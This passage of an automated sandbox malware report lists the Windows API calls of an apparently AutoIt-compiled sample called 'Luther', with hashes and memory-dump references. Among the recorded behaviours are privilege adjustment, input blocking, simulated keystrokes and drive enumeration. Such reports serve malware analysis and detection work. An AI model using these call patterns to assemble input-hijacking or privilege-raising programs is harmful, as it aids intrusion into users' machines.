                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 577356006-0
                                                                                                          • Opcode ID: 0bd24f52a513c7c3173db544c9e5cc2186a8793beeca4cfa959ba2625b524429
                                                                                                          • Instruction ID: a883433cfff1faca0814b0cfedcd9adf3d1bf67482784936097572504d90a17d
                                                                                                          • Opcode Fuzzy Hash: 0bd24f52a513c7c3173db544c9e5cc2186a8793beeca4cfa959ba2625b524429
                                                                                                          • Instruction Fuzzy Hash: 8711BFB1404604BFDB189F54DD86D6BB7FCEB04710B20842EF54663251EB72BC46CB20
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55079
                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55080
                                                                                                          • ExitProcess.KERNEL32 ref: 00E55092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: 8269f2aa2d6ddc5c9b7328437f540b9ecb586d18ef697081be76f0e6f22920fd
                                                                                                          • Instruction ID: fc857f7c6691965c5e6e1fc20e1bbcc02e3ba2475a36979d5533ff0360d89cf6
                                                                                                          • Opcode Fuzzy Hash: 8269f2aa2d6ddc5c9b7328437f540b9ecb586d18ef697081be76f0e6f22920fd
                                                                                                          • Instruction Fuzzy Hash: 58E04632000548AFCF216F65DD08E483BA9EB50386F004424FC09AA161DB77DD4ACBC0
                                                                                                          APIs
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E9ED04
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 2434400541-711622031
                                                                                                          • Opcode ID: fa7ae6547da1af528a08bc27cdc076c3a107985120028ac06de94dba387f36ee
                                                                                                          • Instruction ID: 90d07bc792e16c17ff18827678c294a51fa5ef35c46786b00bedb22986783b85
                                                                                                          • Opcode Fuzzy Hash: fa7ae6547da1af528a08bc27cdc076c3a107985120028ac06de94dba387f36ee
                                                                                                          • Instruction Fuzzy Hash: E3E0C2A62AD7363CBD0421287C07EF7438C8F22B39B11225AFE00F41C0ED915CC651A8
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E8E664
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID: X64
                                                                                                          • API String ID: 2645101109-893830106
                                                                                                          • Opcode ID: 2e27db29b29dfef6f7f7ab8a2c88cfdccaafd803a245bb38b0a7b1d5d459eda4
                                                                                                          • Instruction ID: c79fa72926549f8cb22ee89c8c504e9af85cce3e34b455fa468e27eec412a0d2
                                                                                                          • Opcode Fuzzy Hash: 2e27db29b29dfef6f7f7ab8a2c88cfdccaafd803a245bb38b0a7b1d5d459eda4
                                                                                                          • Instruction Fuzzy Hash: 67D0C9B480512DEACB80CB50EC88DD9737CBB04304F100665F10AB2100D73095499B10
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4229
                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4239
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: 6b8847515f9f18d54eb5cd235e7f7234c946ed5ed34d3b2363577fcd23f7cec4
                                                                                                          • Instruction ID: 4b57f9629778d88493571564d6939ce1147abfe2cc8327d1641ff36999f7b2da
                                                                                                          • Opcode Fuzzy Hash: 6b8847515f9f18d54eb5cd235e7f7234c946ed5ed34d3b2363577fcd23f7cec4
                                                                                                          • Instruction Fuzzy Hash: 90F0E5716043246AE72016A69C4DFEB7AADEFC9761F001175F609F22D1D9B0A905C6B0
                                                                                                          APIs
                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E9BC24
                                                                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E9BC37
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InputSendkeybd_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 3536248340-0
                                                                                                          • Opcode ID: 13c4b871c8d37f140bb636f95c1ba15323f4d1fd60029844622ce723aaff7152
                                                                                                          • Instruction ID: 0d2cb61d21d516bdee0e9f45ada149ffbd1b16d7949ffdb9984104dc8d23ee9c
                                                                                                          • Opcode Fuzzy Hash: 13c4b871c8d37f140bb636f95c1ba15323f4d1fd60029844622ce723aaff7152
                                                                                                          • Instruction Fuzzy Hash: 06F06D7080424DAFDF019FA1D805BFEBBB0FF04309F00901AF951A5191D37A8205DF94
                                                                                                          APIs
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E91B48), ref: 00E91A20
                                                                                                          • CloseHandle.KERNEL32(?,?,00E91B48), ref: 00E91A35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 81990902-0
                                                                                                          • Opcode ID: efa8346af30fd97ba99f3b93c81da39c5440cfd73467a6d074ec2da54b664034
                                                                                                          • Instruction ID: 40d09fdab38f1394688b746517c26539ea30ebe8cf06f6c78f004eb71ad867a7
                                                                                                          • Opcode Fuzzy Hash: efa8346af30fd97ba99f3b93c81da39c5440cfd73467a6d074ec2da54b664034
                                                                                                          • Instruction Fuzzy Hash: 27E04F72009A10AFE7252B15FC06F7677E9FF04351F14882DF89590470DBA36C96DB10
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 00EAF51A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: ebb02fa7362aa4b3bf38bc0f1c434a388962af6fb98e94a88a3108e26108c010
                                                                                                          • Instruction ID: d79c2496ca2038f16b72139684dca377db1a5b924b3a18663dc3d149361e0915
                                                                                                          • Opcode Fuzzy Hash: ebb02fa7362aa4b3bf38bc0f1c434a388962af6fb98e94a88a3108e26108c010
                                                                                                          • Instruction Fuzzy Hash: 0FE048322002045FC710AF69D805E96FBEDAFA9761F008435F849EB351D671FD41CB94
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00E5075E), ref: 00E50D4A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: a0a3cc2b4c8813af16274c62e3232a71f7df00047e2a6a607370e354c5f9e36e
                                                                                                          • Instruction ID: 07ca9c1d77ae6e6e0f22d8c9668cb05324f001bec088f1f6b3cefeb676b741b3
                                                                                                          • Opcode Fuzzy Hash: a0a3cc2b4c8813af16274c62e3232a71f7df00047e2a6a607370e354c5f9e36e
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00EB358D
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00EB35A0
                                                                                                          • DestroyWindow.USER32 ref: 00EB35AF
                                                                                                          • GetDesktopWindow.USER32 ref: 00EB35CA
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EB35D1
                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EB3700
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EB370E
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3755
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00EB3761
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EB379D
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37BF
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37D2
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37DD
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EB37E6
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37F5
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EB37FE
                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3805
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00EB3810
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3822
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED0C04,00000000), ref: 00EB3838
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00EB3848
                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EB386E
                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EB388D
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB38AF
                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3A9C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                          • Opcode ID: b47377fbf956fbf5e9cec24664203740724561c84432b6a20cb42ccac748b81a
                                                                                                          • Instruction ID: f53f5a312be677d25b0018a28045f6de63b93f277f9de528bc7549af78819c92
                                                                                                          • Opcode Fuzzy Hash: b47377fbf956fbf5e9cec24664203740724561c84432b6a20cb42ccac748b81a
                                                                                                          • Instruction Fuzzy Hash: BF026E71900209AFDB14DF65CD89EAE7BB9FB48310F148168F915BB2A0DB76ED05CB60
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?), ref: 00E316B4
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E72B07
                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E72B40
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E72F85
                                                                                                            • Part of subcall function 00E31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E31488,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E31865
                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00E72FC1
                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E72FD8
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E72FEE
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E72FF9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2760611726-4108050209
                                                                                                          • Opcode ID: 13542f77ebdc2fcd8e261ebdfd626486741fc637e1e21611ee22a11f3e548962
                                                                                                          • Instruction ID: 63070f9cecc8574317a26f41c83871b1150af1ee81944d3771f66c5ee88b6aa1
                                                                                                          • Opcode Fuzzy Hash: 13542f77ebdc2fcd8e261ebdfd626486741fc637e1e21611ee22a11f3e548962
                                                                                                          • Instruction Fuzzy Hash: DE12A130604241DFCB25CF15C849BA9BBE1FB44304F18A56DF699BB261C732EC86EB91
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00EB319B
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB32C7
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EB3306
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EB3316
                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EB335D
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00EB3369
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EB33B2
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB33C1
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB33D1
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00EB33D5
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EB33E5
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB33EE
                                                                                                          • DeleteDC.GDI32(00000000), ref: 00EB33F7
                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB3423
                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB343A
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EB347A
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB348E
                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB349F
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EB34D4
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB34DF
                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB34EA
                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EB34F4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: e26d839efd86f73be1b293282b381e8ed7ab47324afb07ee77db021a996c90e9
                                                                                                          • Instruction ID: 1a862b5b3914204e1aed92f6fc96d316c57e89d16e1d1a4ded870148f738afd9
                                                                                                          • Opcode Fuzzy Hash: e26d839efd86f73be1b293282b381e8ed7ab47324afb07ee77db021a996c90e9
                                                                                                          • Instruction Fuzzy Hash: 42B14F71A00209AFEB14DFA9CD4AFAEBBB9FB44710F104115F915E7290D775AD01CB60
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EA5532
                                                                                                          • GetDriveTypeW.KERNEL32(?,00ECDC30,?,\\.\,00ECDCD0), ref: 00EA560F
                                                                                                          • SetErrorMode.KERNEL32(00000000,00ECDC30,?,\\.\,00ECDCD0), ref: 00EA577B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                          • Opcode ID: d576a599e2ccce24bf394e7f387ff85c9bce863f2201f734e034b12343ebb113
                                                                                                          • Instruction ID: 217bbe65c4a34fcaeb5b9c13b9499abd86c0a034eb93cb14a89f009df6f20e20
                                                                                                          • Opcode Fuzzy Hash: d576a599e2ccce24bf394e7f387ff85c9bce863f2201f734e034b12343ebb113
                                                                                                          • Instruction Fuzzy Hash: CF61E132A08A09DBC724DF24C992DB8B7B1AF5A364B64B056F446BF291C732FD01CB41
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00EC1BC4
                                                                                                          • GetDesktopWindow.USER32 ref: 00EC1BD9
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EC1BE0
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC1C35
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC1C55
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC1C89
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC1CA7
                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC1CB9
                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EC1CCE
                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EC1CE1
                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00EC1D3D
                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EC1D58
                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EC1D6C
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00EC1D84
                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00EC1DAA
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00EC1DC4
                                                                                                          • CopyRect.USER32(?,?), ref: 00EC1DDB
                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EC1E46
